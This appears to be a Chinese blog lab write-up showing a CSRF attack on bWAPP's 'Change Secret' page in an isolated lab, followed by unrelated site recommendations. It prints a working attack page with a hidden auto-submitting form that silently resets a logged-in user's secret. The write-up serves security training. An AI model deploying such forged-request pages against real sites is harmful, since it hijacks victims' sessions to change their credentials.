bWAPP-CSRF-ChangeSecret

最新推荐文章于 2023-04-02 21:18:42 发布
最新推荐文章于 2023-04-02 21:18:42 发布
阅读量190 收藏
点赞数
分类专栏: 渗透测试实验 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/123653537
版权

实验环境:

Win7-1(10.10.10.135):模拟用户机

Win7-2(10.10.10.137)+bWAPP:模拟被攻击服务器

kali(10.10.10.139):模拟攻击机

实验过程:

用户机登录服务器bWAPP:

攻击者构造攻击页面,并部署在攻击机上:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
<script type="text/javascript">
    function attack()
    {
        document.getElementById("transfer").submit(); 
    }
</script>
</head>

<body >
<h4 onclick="attack()">click me</h4>
    <form method="POST" id="transfer" action="http://10.10.10.137/bWAPP/csrf_3.php">
        <input type="hidden" name="secret" value="hack">
        <input type="hidden" name="login" value="bee">
        <input type='hidden' name="action" value="Change">
    </form>
</body>
</html>

上述代码的作用是诱使用户点击“click me”,自动跳转到修改密码的页面并自动提交新密码

攻击页面的URL为:http://10.10.10.139/test.html

用户机上访问该URL:

可以成功访问

首先用户成功登录bWAPP,让浏览器记录用户的Cookie

在让用户访问http://10.10.10.139/test.html

并点击“click me”

跳转到如下页面:

表示已经修改成功了

我们查看服务器的数据库:

已经修改成功!!

在有些情况下,用户机点击攻击者构造的链接会自动跳转到如下界面,面跳转错误,经过反复排查后,发现清理了浏览器的数据后,又能够正常跳转了,可能是浏览器自动保存的某些数据让其产生了自动跳转。

Hummer-200
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bWAPP(A8~CSRF)
qq_39670065的博客
08-17 507
A8 - Cross-Site Request Forgery CSRFCross-Site Request Forgery (Change Secret)Cross-Site Request Forgery (Change Secret)Cross-Site Request Forgery (Transfer Amount) Cross-Site Request Forgery (Change Secret) CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,
JS合并表格
08-16
JS合并表格,绝对实用,代码都是自己在项目中运用过的。
单元格合并插件tablesMergeCell.js
06-01
jquery表格单元格合并
js创建对象
mengyun00的专栏
02-27 725
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> http://www.w3.org/1999/xhtml"> 无标题文档     //通过 new Object() 空白的对象   //var obj=new Object();    //定义空白类   function Test(){
table表格中单元格的合并
热门推荐
greentrainsad的博客
11-01 1万+
表格中单元格的合并
bWAPP CSRF(Cross-site request forgery)跨站请求伪造
angry_program的博客
03-14 1007
简介 CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 0x01、CSRF (Change...
bWAPP——CSRF
weixin_41182861的博客
08-29 1064
一、CSRF (Change Password) 1.1、Low 本场景,通过GET请求方式修改密码, 并且验证仅验证两次输入的新密码是否相同: 面对本场景的攻击:攻击者将在自己的站点上构造恶意页面,并引诱被攻击者访问恶意页面的链接,即可达到攻击目的。 恶意页面源码: //1.链接利用(a标签) <a href="http://192.168.83.129:10001/csrf_1.php?password_new=hack&password_conf=hack&action=
JS生成表格,合并单元格
weixin_33809981的博客
01-29 239
在网上找了这么多都没有JS生成表格然后JS操作合并单元格的,或者是别人写的太负责了,又不想去理解,所以就自己动手写了个简单点的。 其实代码也不多,思路清晰就基本上可以了。一开始的时候是被colspan蒙了,因为要注意大小写才可以的。看下代码, <html><head><scripttype="text/javascript"&...
【js】表格合并
weixin_37624436的博客
12-08 215
function tableMerge(name, v) { let tr = $(name).find('tr').length; for (let item in v) { let mark = 0; let index = 0; if (tr > 1) { for (let i = 0; i < tr; i.
js 表格合并
weixin_30580943的博客
08-14 91
1.合并 function autoRowSpan(tbid, row, col) { var tb = document.getElementById(tbid); var lastValue = ""; var value = ""; var pos = 1; for (var i...
表格单元格合并js
08-24
前台页面table合并单元格,可以指定合并但愿格的列数。 _w_table_lefttitle_rowspan("#evalAspectTable",1,1); 函数说明:合并指定表格(表格id为_w_table_id)指定列 (行数大于_w_table_mincolnum 小于_w_table_maxcolnum)相同列中的相同文本的相邻单元格 多于一列时,后一列的单元格合并范围不能超过前一列的合并范围。避免出现交错。 参数说明:_w_table_id 为需要进行合并单元格的表格id。如在HTMl中指定表格 id="data" ,此参数应为 #data 参数说明:_w_table_mincolnum 为需要进行比较合并的起始列数。为数字,则从最左边第一行为1开始算起。 此参数可以为空,为空则第一列为起始列。需要注意,如果第一列为序号列,则需要排除此列。 参数说明:_w_table_maxcolnum 为需要进行比较合并的最大列数,列数大于这个数值的单元格将不进行比较合并。 为数字,从最左边第一列为1开始算起。此参数可以为空,为空则同_w_table_mincolnum
js实现表格相同数据合并
07-10
相邻表格相同数据看起来不好看,而且显得冗余,如果将相邻表格的相同数据进行合并处理,不仅看起来美观很多,而且显得更加的专业。
表格行列合并JS
01-09
//函数说明:合并指定表格(表格id为_w_table_id)指定列(列数为_w_table_colnum)的相同文本的相邻单元格 //参数说明:_w_table_id 为需要进行合并单元格的表格的id。如在HTMl中指定表格 id="data" ,此参数应为 #data //参数说明:_w_table_colnum 为需要合并单元格的所在列。为数字,从最左边第一列为1开始算起。 //函数说明:合并指定表格(表格id为_w_table_id)指定行(行数为_w_table_rownum)的相同文本的相邻单元格 //参数说明:_w_table_id 为需要进行合并单元格的表格id。如在HTMl中指定表格 id="data" ,此参数应为 #data //参数说明:_w_table_rownum 为需要合并单元格的所在行。其参数形式请参考jQuery中nth-child的参数。 // 如果为数字,则从最左边第一行为1开始算起。 // "even" 表示偶数行 // "odd" 表示奇数行 // "3n+1" 表示的行数为1、4、7、10....... //参数说明:_w_table_maxcolnum 为指定行中单元格对应的最大列数,列数大于这个数值的单元格将不进行比较合并。 // 此参数可以为空,为空则指定行的所有单元格要进行比较合并。
next-csrf:Next.js的CSRF缓解
05-14
next-csrf Next.js的CSRF缓解。 特征 next-csrf实现的缓解模式: 使用 (另请 ) 安装 含纱线: yarn add next-csrf 使用npm: npm i next-csrf --save 用法 设置: // file: lib/csrf.js import { nextCsrf } ...
安全性测试--CSRF攻击
02-20
CSRF(Cross-siterequestforgery),中文名称:跨站请求伪造,也被称为:oneclickattack/sessionriding,缩写为:CSRF/XSRF。你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做...
No-CSRF-crx插件
04-02
语言:English 阻止cookie作为客户端发送的横向原点。 跨站点请求伪造是浏览网页时的一个主要问题。... 此扩展是开源的,源代码在https://github.com/brandonio21/no-csrf中查看 此扩展基于AVLIDIENBRUNN 的类似扩展
CSRF:ring-csrf示例
01-28
CSRF:ring-csrf示例
js实现自定义合并单元格,el-table开箱即用
sssdal19995的博客
04-02 2583
分享一个简单易用的计算表格内单元格合并的工具,支持行合并、列合并等常见场景
Anti-CSRF token
最新发布
09-24
Anti-CSRF token(跨站请求伪造防护令牌)是一种用于保护网站免受跨站请求伪造(CSRF)攻击的安全机制。它通过在用户访问网站时生成一个唯一的令牌,并将该令牌嵌入到每个表单或请求中。在提交表单或请求时,服务器会验证该令牌是否有效,如果无效则拒绝该请求。 使用Anti-CSRF token可以有效防止攻击者利用用户的身份执行恶意请求。攻击者往往通过诱使用户点击包含恶意代码的链接或访问被攻击的网站,然后在用户不知情的情况下发送恶意请求。但由于攻击者无法获取到有效的Anti-CSRF token,即使请求被发送到服务器,也会因为缺少有效的令牌而被服务器拒绝。 通常,生成Anti-CSRF token需要使用随机数生成器来确保每个令牌的唯一性。服务器端将生成的令牌存储在会话中,并在每次请求时将其与用户提交的令牌进行比较。如果两者不匹配,服务器会拒绝该请求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值